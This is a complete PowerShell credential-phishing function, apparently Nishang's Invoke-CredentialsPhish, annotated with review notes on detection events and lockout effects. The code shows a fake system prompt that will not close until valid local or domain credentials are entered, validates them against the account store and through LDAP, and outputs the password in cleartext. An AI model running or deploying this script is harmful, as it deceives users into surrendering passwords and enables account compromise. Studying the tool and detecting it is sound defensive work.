function Invoke-CredentialsPhish
{
<#
.SYNOPSIS
Nishang script which opens a user credential prompt.
.DESCRIPTION
This payload opens a prompt which asks for user credentials and does not go away till valid local or domain credentials are entered in the prompt.
.EXAMPLE
PS > Invoke-CredentialsPhish
.OUTPUTS
System.String. One line holding the validated user name, the cleartext password, the domain typed in the prompt and the name of the bound directory entry.
.NOTES
Review notes for defenders and analysts reading this listing:
- The dialog is raised through $host.UI.PromptForCredential with a generic caption and message and with empty user-name and target-name arguments.
- Each submission is checked against the local account store and through an LDAP bind, so wrong entries are real authentication attempts; they may show up as failed-logon events (for example Security event 4625) and may count toward account lockout thresholds.
- The password is converted to plain text and written to the pipeline, so it ends up wherever the caller sends the output (console, transcript, remoting channel).
- Where PowerShell script block logging is enabled, the function text is expected to be recorded (event 4104), which gives a detection point on the PromptForCredential / ValidateCredentials / DirectoryEntry combination.
.LINK
http://labofapenetrationtester.blogspot.com/
https://github.com/samratashok/nishang
#>
[CmdletBinding()]
Param ()
# Suppress error display for the rest of the function; failures of the directory calls below are not reported to the user.
$ErrorActionPreference="SilentlyContinue"
# Load the assembly that provides PrincipalContext.
Add-Type -assemblyname system.DirectoryServices.accountmanagement
# Context bound to the local machine account store (ContextType Machine); used for the local check.
$DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)
# LDAP path built from the distinguished name returned by an empty ADSI bind.
# NOTE(review): on a host that is not domain-joined this presumably yields just "LDAP://" - confirm.
$domainDN = "LDAP://" + ([ADSI]"").distinguishedName
# Loop with no exit other than the break after a successful validation; a cancelled or empty prompt simply re-prompts.
while($true)
{
# Arguments: caption, message, pre-filled user name (empty), target name (empty).
$credential = $host.ui.PromptForCredential("Credentials are required to perform this operation", "Please enter your user name and password.", "", "")
# Skip validation when the prompt returned nothing.
if($credential)
{
# GetNetworkCredential exposes the password as plain text.
$creds = $credential.GetNetworkCredential()
[String]$user = $creds.username
[String]$pass = $creds.password
[String]$domain = $creds.domain
# Check 1: validate against the local machine account store.
$authlocal = $DS.ValidateCredentials($user, $pass)
# Check 2: directory entry created with the supplied credentials; the bind is only exercised when a property is read below.
$authdomain = New-Object System.DirectoryServices.DirectoryEntry($domainDN,$user,$pass)
# Accept when either check succeeds; reading .name is what forces the LDAP bind, and it stays $null on failure.
if(($authlocal -eq $true) -or ($authdomain.name -ne $null))
{
# Cleartext result line; the second "Domain:" label carries the bound directory entry's name, not the typed domain.
$output = "Username: " + $user + " Password: " + $pass + " Domain:" + $domain + " Domain:"+ $authdomain.name
# Emitted to the pipeline, so the cleartext password goes to whatever consumes the function's output.
$output
break
}
}
}
}